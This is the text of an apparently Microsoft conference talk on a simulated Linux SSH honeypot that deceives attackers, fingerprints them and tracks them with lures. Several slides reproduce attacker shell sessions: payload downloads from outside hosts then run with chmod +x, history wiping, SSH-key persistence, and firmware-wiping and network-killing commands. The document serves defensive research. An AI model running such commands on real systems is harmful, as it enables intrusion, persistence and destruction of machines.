Ross Bevington, Microsoft In ‘The Matrix’ sentient machines subdue the population by developing a highly sophisticated simulation. High interaction honeypots are a lot like The Matrix, designed to convince an attacker to execute an attack so we can monitor them. But these honeypots are flawed! Attackers are continually adapting in order to evade our defenses - meaning that it’s often not enough to just set up a honeypot and watch the results roll in. Is a new approach better? Did you know that 40% of IaaS VMs in Azure are Linux? For Microsoft to protect itself and its customers Linux is a priority. At MSTIC we’ve developed a new type of Linux honeypot that allows us to deceive and control the behavior of an attacker. We are using this to understand the person behind the attack, examining them as they examine us. Using these techniques, we are able to better track the person behind the threat, build better protections and ultimately protect more Linux users - whether they are using Azure or not. In this presentation I’ll show some of the successes of running a Matrix like environment, failures where a glitch was spotted as well as deception approaches that could be applied to other domains. Finally I’ll show how easy it is to leverage Azure’s big data capabilities to build and ultimately query all this data at scale as well as how you can immediately reap the benefits of this work by connecting your Linux box to Azure Security Center.

3. APT
Nation
state
Automated
Bots
‘Script kiddy’
Organised groups
Crime/hacktivism
High impact, low frequency
EAPT
High frequency, arguably also high impact
Generally easily rebuked via
Software updates& firewalletc
FT Analysts, red teaming

4. 1500 identical
commands
All the commands typed
in less than 500 times
Real people
The biggest bots
MIRAI etc
Raspberry PI
Botnet attacks

5. Anatomy of a Linux attack
1. Exploit and immediate action
2. Brute force and immediate action
3. Brute force creds…move to different infrastructure…and action
• Coin mining is extremely popular

7. What is deception?
• Emerging area of InfoSec
• Usually centred around the
human behind the attack
• Has actually been around a
long time

8. Honeypots
• Standard technique to study attackers for many years
• Low – dumb listener / just log network connections
• Medium – emulate key services
• High – actual OS

9. Honeypots are broken!
• Relatively easy to spot a honeypot
• Lots of ports, Shodan, odd routes to the Internet
• Honeypots tell you about an attack but not the attacker
• Do we care about the attack or the attacker?
• Deception is usually used for alerting, can we use it for tracking?

10. Honeypots & the fog of war
Only success

11. Enter the hybrid
Only success
Extreme cases
Only failure
Traditional
honeypots

12. Hybrid
• Provide an environment that appears to be legitimate
• Take the best of low / medium interaction honeypots
• Add faults to cause an attacker to take alternative actions
• Faults are targeted to collect information we want
• New IPs, files, URLs etc
• Combine with traditional honeypots to see the outcome of an attack

18. These are your tools
• Lies
• Persuasion
• Mimicry
• Distraction
• Traps & Decoys
• Lures & Breadcrumbs
• Everything society told you not to do!

19. Threat model
• Not bots
• Just need a good simulation
• Not state / APT
• Simulation won’t be good enough
• High end actors are targeted in their attacks, won’t find us etc
• Middle ground
• Real people, script kiddies

20. Honeypot
Attacker
Real
systems

22. How is it implemented?
• 100% C# SSH implementation with Bash/Linux simulator on top
• Can PuTTY, SFTP & SCP, Docker, MySQL (and more)
• Logs all TCP/SYN for trends
3 attemptsto login, successful loginsare cached
Kernel & OS is randomised
Results are canned or coded in C#
100% simulation, nothing is
ever executed

23. Deployment
Processing Results
Log
Analytics
Virus
Total
Internal
sources
and tools
Japan
UK &
EU
West
USA
Central
USA
West
Threat intel
feeds
MSRC
VMs on Azure and other
providers

24. Format data as JSON,
Code on GitHub to upload
Query in NRT

25. Listening carefully
• SSH protocol is complex
• It’s remote access, it’s a proxy, it’s file transfer
• Bit like SSL/TLS, you start by negotiating crypto
• Client/server say what algorithms they support
• Messages are passed from client to server and responded to
• Lots of extensions (such as PuTTY ones)

26. What do we get by listening hard?
• The client sends machine specific data to the server
• ciphers, agent strings, supported modes, terminal size
• Environment variables (we see locale’s)
^
really
• The first packet comes from the attackers machines
• This has some magic fields: TTL, Window size, TCP timestamp

27. And the point of all this?
• Can use sources of entropy to build a fingerprint & track across
infrastructure
• We can work out
• Attackers real OS
• How deep they are in a network
• How long their machine has been up (highly unreliable)
• Can compare real OS to the SSH agent banner
• Maybe even look up identity!
• https://github.com/FiloSottile/whosthere

29. Hybrid theory
• We want URLs
• Need to balance enumeration with attacker expectations
• Small wins & the rule of three
• Include reason why!
user@exploited:~$ wget 374.53.15.95/test.jpg –O a.out
Resolving baddomain.com (baddomain.com)... failed: Name or service not known.
user@exploited:~$ curl 374.53.15.95/test.jpg
curl: (22) The requested URL returned error: 403 Forbidden
user@exploited:~$ curl newdomain.com/test.jpg
user@exploited:~$ chmod +x a.out

30. Enrich existing data
• A lot of malware is uploaded in ZIP format
• ZIP spec doesn’t contain much machine specific metadata
• TAR does!
user@exploited:~$ unzip malware.zip
bash: unzip: command not found
user@exploited:~$ tar
tar: You must specify one of the `-Acdtrux' or `--test-label' options
Try `tar --help' or `tar --usage' for more information.

31. Tracking stolen data
• When attackers break in they nose around
• Might be looking for more creds
• Might be looking for data to steal
• Tokens used for years to signal when an attack has started
• https://canarytokens.org/generate
• We know we are under attack

32. How does it work?
AWS credentials
using them triggers an email alert
Visiting the URL triggers an email alert
Hosting real files on the honeypot

37. user@billingserver:~$ uname –a
Linux billingserver 4.15.0-1013
user@billingserver:~$ cat link.txt
This is the link to the temp mobile site, creds paydbadmin:!pP543fddgZ@
Was so long I had to shorten it! DO NOT SHARE AROUND!!!
https://bit.ly/2oWZ2aL
user@billingserver:~$ wget XXXXXXXX.altervista.org/scan.jpg –O a.out
Resolving altervista.org (altervista.org)... failed: Name or service not known.
user@billingserver:~$ wget http://111.222.333.444/scan.jpg
Resolving 111.222.333.444 (111.222.333.444)... failed: Name or service not known.
user@billingserver:~$ history -c
user@billingserver:~$ wget https://raw.githubusercontent.com/XXXX/XXX/master/source.zip
user@billingserver:~$ unzip source.zip
unzip: cannot find libzip1.so - found libgz.so libbz.so
user@billingserver:~$ wget https://raw.githubusercontent.com/XXXX/XXX/master/source.tgz
user@billingserver:~$ tar xvf && cd source
user@billingserver:~$ gcc main.c && ./a.out
Segmentation fault
user@billingserver:~$
Broadcast message from root@exploited
The system is shutting down in 1m due to UPS failure
user@billingserver:~$ echo 'ssh-rsa AAAAB3NzaC1yc2EAA==' >> ~/.ssh/authorized_keys
ALL USERS MUST AGREE TO THE TERMS & CONDITIONS
user@billingserver:~$ chmod +x a.out && .a.out

40. From DigitalOcean to Romania
a real attack mounted by a real person
Logs in from 198.199.70.152
& tries to installcoinminer
downloads‘link.txt’
Visits link from 5.12.130.162
(IP is clean)
I see an attacker visit
the link from a RomanianIP
I see info on an attack
launchedfrom a DigitalOceanIP
& the Monero mining account

41. People making mistakes

44. Attackers proxying

45. A glitch in the matrix! Attacker
of the
month
Racist profanityremoved!

46. A glitch in the matrix!
user@exploited:~$ lscpu
…
user@exploited:~$ nproc
8
user@exploited:~$ clear
user@exploited:~$ sudo su
root@:~$ cat /etc/*-release
cat: /etc/*-release: No such file or directory
user@exploited:~$ sudo su
root@:~$ cat /proc/mounts
root@:~$ cat /dev/urandom | mtd_write mtd0 - 0 32768
root@:~$ iproute del default
root@:~$ iptables -A INPUT -j DROP
root@:~$ reboot

47. ‘White hat’ tries to fix my box
• Spare a thought for the attacker who ran ~60 commands
and spent 10m trying to fix the HP’s DNS resolver!

48. Analysts
developnew
detections
on this data

50. tl;dr
• We use deception technology to protect customers
• Understand the attacker as well as the attack
• Use Azure Security Centre to start benefiting
• Big data? Use Log Analytics and Kusto
• Ross.Bevington@Microsoft.com